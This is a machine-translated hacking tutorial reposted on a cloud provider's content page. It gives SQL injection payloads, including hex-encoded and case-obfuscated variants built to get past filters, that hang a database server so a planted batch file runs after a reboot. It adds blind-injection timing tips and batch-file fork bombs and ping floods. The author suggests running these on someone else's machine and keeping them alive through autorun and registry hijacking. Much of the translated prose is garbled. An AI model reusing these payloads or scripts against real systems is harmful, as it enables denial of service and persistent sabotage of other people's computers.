Inject code to stop the server from responding

Source: Internet
Author: User

Author:The 250048111@qq.com (yezi)
Sometimes, after backing up a batch in the database to the Startup menu, we want the server to run our batch processing at the next restart. But what should we do if we wait and the server does not restart? Ask the Administrator to restart the system. Haha
The following injection code causes the server to stop responding, or the response is slow. To achieve better results, drop the injection point and execute it several times. The final administrator restarts the server.
Digital injection points:
; WHiLe 1 <9 bEgIn select cHaR (0) eNd --
Text injection point:
; WHiLe 1 <9 bEgIn select cHaR (0) eNd --
Or run the following command in Declare + EXEC mode:
; DEcLaRe @ s vArChAr (8000) sEt @ s = 0x7748694c6520313c392

0624567496e2073456c456354206348615228302920654e64 eXeC (@ s )--
; DEcLaRe @ s vArChAr (8000) sEt @ s = 0x7748694c6520313c392

0624567496e2073456c456354206348615228302920654e64 eXeC (@ s )--
The code above creates an endless loop on the database server, causing the server to be exhausted and thus dos. The Administrator will restart the server for you.
Note: The above code is aggressive. Please use it with caution.
Note: The select char (0) can be changed to select power (1.23456, 100) to increase the calculation workload.
----------------- Cigarette holder --------------------
; WHiLe 1 <9 bEgIn select cHaR (0) eNd --
This statement indicates that when 1 is 9 small, the ASCII code 0 is reversed. It is an endless loop because it is always established. Until the machine resources are exhausted
The character size is changed to bypass website filtering and prevent injection.
; Declare @ s varchar (8000) set @ s = 0x7748694c6520313c3920624567496e2

073456c456354206348615228302920654e64 exec (@ s )--
Declare @ s varchar (8000) defines @ s as varchar 8000 in length. Yes? WHiLe 1 <9 bEgIn select cHaR (0) eNd? Encode with HEX and return the value to @ s, and then execute with exec ..
The function is to bypass website filtering and anti-injection.
; WHiLe 1 <9 bEgIn select cHaR (0) eNd --
Because it is injection of injection type. I cannot explain it clearly.
Select power (1.23456, 100) returns the 1.23456 power root of 100. It's strange that it's not dead.
The concat function Concatenates the Character Differences in the content. benchmark (9999999999999, md5 (test) reports the running time of the client. Blind injection may be useful.
I don't know what the concat function does for attacks? W hex Encoding 0x77 benchmark (9999999999999, md5 (0x77) This may bypass anti-Injection
Cool!
Bytes ----------------------------------------------------------------------------------------------------
Ping enhanced version of endless loop
Source: colored radish s bolg
Testing on a virtual machine is recommended.
Or run the change batch processing on someone else's computer.
She can make her computer fail to respond immediately
Instead, you have to restart the machine.
If you are still poisoned, you can put her in the startup Item.
Add an Autorun file if it is still poisoned. open = this batch path
Then, the image is hijacked in the registry, allowing her to click commonly used tools such as QQ, MSN, and IE.
Activate Batch Processing
Let her go
Dual-core tests have also been performed and can only be restarted, reflecting a simpler response than before.
Loop loops must be N times stronger
Haha
It's too late to knock shutdown-
Close group and other operations
Pure entertainment
No harm to system files
No problem after restart
The attachment contains the source files during my test. If you are lazy, you can download them.
Attached source file content
Note: extract the two files to the same directory.
Start. bat

@ Echo off
Color 2f
Echo.
Title endless loop-ping enhanced version-zzw Creation
Echo ####################################### #############################
Echo # ping enhanced version-zzw creation for endless loops #
Echo ####################################### #############################
Echo.
: Loop
Start zzw. bat
Goto: loop
Echo started successfully

Zzw. bat

@ Echo off
Ping fig-l 65500-t

Attached to previous dead loop Batch Processing

@ Echo off
: Loop
Start cmd.exe
Goto: loop

Of course, some people may ask if they don't want to replace cmd.exe with other applications, but if you want to know that her computer has those big applications
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.